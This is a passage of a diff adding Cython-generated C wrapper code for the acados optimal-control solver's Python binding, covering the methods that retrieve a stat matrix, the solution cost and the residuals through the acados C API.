__pyx_kwvalues, __pyx_n_s_field)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 438, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_n)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 438, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_matrix", 1, 3, 3, 1); __PYX_ERR(0, 438, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_m)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 438, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_matrix", 1, 3, 3, 2); __PYX_ERR(0, 438, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "_AcadosOcpSolverCython__get_stat_matrix") < 0)) __PYX_ERR(0, 438, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 3)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + } + __pyx_v_field = values[0]; + __pyx_v_n = values[1]; + __pyx_v_m = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("_AcadosOcpSolverCython__get_stat_matrix", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 438, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_matrix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_28__get_stat_matrix(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_field, __pyx_v_n, __pyx_v_m); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_28__get_stat_matrix(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_field, PyObject *__pyx_v_n, PyObject *__pyx_v_m) { + PyArrayObject *__pyx_v_out_mat = 0; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out_mat; + __Pyx_Buffer __pyx_pybuffer_out_mat; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + int __pyx_t_6; + PyArrayObject *__pyx_t_7 = NULL; + char const *__pyx_t_8; + char *__pyx_t_9; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("_AcadosOcpSolverCython__get_stat_matrix", 0); + __pyx_pybuffer_out_mat.pybuffer.buf = NULL; + __pyx_pybuffer_out_mat.refcount = 0; + __pyx_pybuffernd_out_mat.data = NULL; + __pyx_pybuffernd_out_mat.rcbuffer = &__pyx_pybuffer_out_mat; + + /* "acados_template/acados_ocp_solver_pyx.pyx":439 + * + * def __get_stat_matrix(self, field, n, m): + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + * return out_mat + */ + __Pyx_GetModuleGlobalName(__pyx_t_1, __pyx_n_s_np); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_1, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_zeros); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_v_n); + __Pyx_GIVEREF(__pyx_v_n); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_v_n); + __Pyx_INCREF(__pyx_v_m); + __Pyx_GIVEREF(__pyx_v_m); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_v_m); + __pyx_t_5 = NULL; + __pyx_t_6 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_4))) { + __pyx_t_5 = PyMethod_GET_SELF(__pyx_t_4); + if (likely(__pyx_t_5)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); + __Pyx_INCREF(__pyx_t_5); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_4, function); + __pyx_t_6 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_5, __pyx_t_3}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_6, 1+__pyx_t_6); + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + } + __pyx_t_4 = PyTuple_New(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GIVEREF(__pyx_t_1); + PyTuple_SET_ITEM(__pyx_t_4, 0, __pyx_t_1); + __pyx_t_1 = 0; + __pyx_t_1 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_np); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_float64); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (PyDict_SetItem(__pyx_t_1, __pyx_n_s_dtype, __pyx_t_5) < 0) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __pyx_t_5 = __Pyx_PyObject_Call(__pyx_t_2, __pyx_t_4, __pyx_t_1); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 439, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + if (!(likely(((__pyx_t_5) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_5, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 439, __pyx_L1_error) + __pyx_t_7 = ((PyArrayObject *)__pyx_t_5); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out_mat.rcbuffer->pybuffer, (PyObject*)__pyx_t_7, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES, 2, 0, __pyx_stack) == -1)) { + __pyx_v_out_mat = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 439, __pyx_L1_error) + } else {__pyx_pybuffernd_out_mat.diminfo[0].strides = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out_mat.diminfo[0].shape = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.shape[0]; __pyx_pybuffernd_out_mat.diminfo[1].strides = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.strides[1]; __pyx_pybuffernd_out_mat.diminfo[1].shape = __pyx_pybuffernd_out_mat.rcbuffer->pybuffer.shape[1]; + } + } + __pyx_t_7 = 0; + __pyx_v_out_mat = ((PyArrayObject *)__pyx_t_5); + __pyx_t_5 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":440 + * def __get_stat_matrix(self, field, n, m): + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) # <<<<<<<<<<<<<< + * return out_mat + * + */ + __pyx_t_8 = __Pyx_PyObject_AsString(__pyx_v_field); if (unlikely((!__pyx_t_8) && PyErr_Occurred())) __PYX_ERR(0, 440, __pyx_L1_error) + __pyx_t_9 = __pyx_f_5numpy_7ndarray_4data_data(((PyArrayObject *)__pyx_v_out_mat)); if (unlikely(__pyx_t_9 == ((char *)NULL) && PyErr_Occurred())) __PYX_ERR(0, 440, __pyx_L1_error) + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, __pyx_t_8, ((void *)__pyx_t_9)); + + /* "acados_template/acados_ocp_solver_pyx.pyx":441 + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + * return out_mat # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF((PyObject *)__pyx_v_out_mat); + __pyx_r = ((PyObject *)__pyx_v_out_mat); + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":438 + * return out + * + * def __get_stat_matrix(self, field, n, m): # <<<<<<<<<<<<<< + * cdef cnp.ndarray[cnp.float64_t, ndim=2] out_mat = np.ascontiguousarray(np.zeros((n, m)), dtype=np.float64) + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, field, out_mat.data) + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + { PyObject *__pyx_type, *__pyx_value, *__pyx_tb; + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ErrFetch(&__pyx_type, &__pyx_value, &__pyx_tb); + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out_mat.rcbuffer->pybuffer); + __Pyx_ErrRestore(__pyx_type, __pyx_value, __pyx_tb);} + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython._AcadosOcpSolverCython__get_stat_matrix", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + goto __pyx_L2; + __pyx_L0:; + __Pyx_SafeReleaseBuffer(&__pyx_pybuffernd_out_mat.rcbuffer->pybuffer); + __pyx_L2:; + __Pyx_XDECREF((PyObject *)__pyx_v_out_mat); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # <<<<<<<<<<<<<< + * """ + * Returns the cost value of the current solution. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost, "\n Returns the cost value of the current solution.\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost = {"get_cost", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_31get_cost(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_cost (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("get_cost", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "get_cost", 0))) return NULL; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_30get_cost(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self) { + double __pyx_v_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_cost", 0); + + /* "acados_template/acados_ocp_solver_pyx.pyx":449 + * """ + * # compute cost internally + * acados_solver_common.ocp_nlp_eval_cost(self.nlp_solver, self.nlp_in, self.nlp_out) # <<<<<<<<<<<<<< + * + * # create output + */ + ocp_nlp_eval_cost(__pyx_v_self->nlp_solver, __pyx_v_self->nlp_in, __pyx_v_self->nlp_out); + + /* "acados_template/acados_ocp_solver_pyx.pyx":455 + * + * # call getter + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, "cost_value", &out) # <<<<<<<<<<<<<< + * + * return out + */ + ocp_nlp_get(__pyx_v_self->nlp_config, __pyx_v_self->nlp_solver, ((char const *)"cost_value"), ((void *)(&__pyx_v_out))); + + /* "acados_template/acados_ocp_solver_pyx.pyx":457 + * acados_solver_common.ocp_nlp_get(self.nlp_config, self.nlp_solver, "cost_value", &out) + * + * return out # <<<<<<<<<<<<<< + * + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyFloat_FromDouble(__pyx_v_out); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 457, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":444 + * + * + * def get_cost(self): # <<<<<<<<<<<<<< + * """ + * Returns the cost value of the current solution. + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_cost", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "acados_template/acados_ocp_solver_pyx.pyx":460 + * + * + * def get_residuals(self, recompute=False): # <<<<<<<<<<<<<< + * """ + * Returns an array of the form [res_stat, res_eq, res_ineq, res_comp]. + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +PyDoc_STRVAR(__pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals, "\n Returns an array of the form [res_stat, res_eq, res_ineq, res_comp].\n "); +static PyMethodDef __pyx_mdef_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals = {"get_residuals", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals}; +static PyObject *__pyx_pw_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_33get_residuals(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_recompute = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("get_residuals (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_recompute,0}; + PyObject* values[1] = {0}; + values[0] = ((PyObject *)Py_False); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_recompute); + if (value) { values[0] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 460, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "get_residuals") < 0)) __PYX_ERR(0, 460, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_recompute = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("get_residuals", 0, 0, 1, __pyx_nargs); __PYX_ERR(0, 460, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("acados_template.acados_ocp_solver_pyx.AcadosOcpSolverCython.get_residuals", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals(((struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *)__pyx_v_self), __pyx_v_recompute); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_15acados_template_21acados_ocp_solver_pyx_21AcadosOcpSolverCython_32get_residuals(struct __pyx_obj_15acados_template_21acados_ocp_solver_pyx_AcadosOcpSolverCython *__pyx_v_self, PyObject *__pyx_v_recompute) { + PyArrayObject *__pyx_v_out = 0; + double __pyx_v_double_value; + PyObject *__pyx_v_field = NULL; + __Pyx_LocalBuf_ND __pyx_pybuffernd_out; + __Pyx_Buffer __pyx_pybuffer_out; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + int __pyx_t_2; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_t_9; + PyArrayObject *__pyx_t_10 = NULL; + char const *__pyx_t_11; + Py_ssize_t __pyx_t_12; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("get_residuals", 0); + __pyx_pybuffer_out.pybuffer.buf = NULL; + __pyx_pybuffer_out.refcount = 0; + __pyx_pybuffernd_out.data = NULL; + __pyx_pybuffernd_out.rcbuffer = &__pyx_pybuffer_out; + + /* "acados_template/acados_ocp_solver_pyx.pyx":465 + * """ + * # compute residuals if RTI + * if self.nlp_solver_type == 'SQP_RTI' or recompute: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_eval_residuals(self.nlp_solver, self.nlp_in, self.nlp_out) + * + */ + __pyx_t_2 = (__Pyx_PyUnicode_Equals(__pyx_v_self->nlp_solver_type, __pyx_n_u_SQP_RTI, Py_EQ)); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 465, __pyx_L1_error) + if (!__pyx_t_2) { + } else { + __pyx_t_1 = __pyx_t_2; + goto __pyx_L4_bool_binop_done; + } + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_v_recompute); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(0, 465, __pyx_L1_error) + __pyx_t_1 = __pyx_t_2; + __pyx_L4_bool_binop_done:; + if (__pyx_t_1) { + + /* "acados_template/acados_ocp_solver_pyx.pyx":466 + * # compute residuals if RTI + * if self.nlp_solver_type == 'SQP_RTI' or recompute: + * acados_solver_common.ocp_nlp_eval_residuals(self.nlp_solver, self.nlp_in, self.nlp_out) # <<<<<<<<<<<<<< + * + * # create output array + */ + ocp_nlp_eval_residuals(__pyx_v_self->nlp_solver, __pyx_v_self->nlp_in, __pyx_v_self->nlp_out); + + /* "acados_template/acados_ocp_solver_pyx.pyx":465 + * """ + * # compute residuals if RTI + * if self.nlp_solver_type == 'SQP_RTI' or recompute: # <<<<<<<<<<<<<< + * acados_solver_common.ocp_nlp_eval_residuals(self.nlp_solver, self.nlp_in, self.nlp_out) + * + */ + } + + /* "acados_template/acados_ocp_solver_pyx.pyx":469 + * + * # create output array + * cdef cnp.ndarray[cnp.float64_t, ndim=1] out = np.ascontiguousarray(np.zeros((4,), dtype=np.float64)) # <<<<<<<<<<<<<< + * cdef double double_value + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_5 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_ascontiguousarray); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_np); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_zeros); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_GetModuleGlobalName(__pyx_t_7, __pyx_n_s_np); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_7); + __pyx_t_8 = __Pyx_PyObject_GetAttrStr(__pyx_t_7, __pyx_n_s_float64); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; + if (PyDict_SetItem(__pyx_t_4, __pyx_n_s_dtype, __pyx_t_8) < 0) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_t_6, __pyx_tuple__25, __pyx_t_4); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = NULL; + __pyx_t_9 = 0; + if (CYTHON_UNPACK_METHODS && unlikely(PyMethod_Check(__pyx_t_5))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_5); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_5); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_5, function); + __pyx_t_9 = 1; + } + } + { + PyObject *__pyx_callargs[2] = {__pyx_t_4, __pyx_t_8}; + __pyx_t_3 = __Pyx_PyObject_FastCall(__pyx_t_5, __pyx_callargs+1-__pyx_t_9, 1+__pyx_t_9); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 469, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + } + if (!(likely(((__pyx_t_3) == Py_None) || likely(__Pyx_TypeTest(__pyx_t_3, __pyx_ptype_5numpy_ndarray))))) __PYX_ERR(0, 469, __pyx_L1_error) + __pyx_t_10 = ((PyArrayObject *)__pyx_t_3); + { + __Pyx_BufFmt_StackElem __pyx_stack[1]; + if (unlikely(__Pyx_GetBufferAndValidate(&__pyx_pybuffernd_out.rcbuffer->pybuffer, (PyObject*)__pyx_t_10, &__Pyx_TypeInfo_nn___pyx_t_5numpy_float64_t, PyBUF_FORMAT| PyBUF_STRIDES| PyBUF_WRITABLE, 1, 0, __pyx_stack) == -1)) { + __pyx_v_out = ((PyArrayObject *)Py_None); __Pyx_INCREF(Py_None); __pyx_pybuffernd_out.rcbuffer->pybuffer.buf = NULL; + __PYX_ERR(0, 469, __pyx_L1_error) + } else {__pyx_pybuffernd_out.diminfo[0].strides = __pyx_pybuffernd_out.rcbuffer->pybuffer.strides[0]; __pyx_pybuffernd_out.diminfo[0].shape = __pyx_pybuffernd_out.rcbuffer->pybuffer.shape[0]; + } + } + __pyx_t_10 = 0; + __pyx_v_out = ((PyArrayObject *)__pyx_t_3); + __pyx_t_3 = 0; + + /* "acados_template/acados_ocp_solver_pyx.pyx":472 + * cdef double double_value + * + * field = "res_stat".encode('utf-8') # 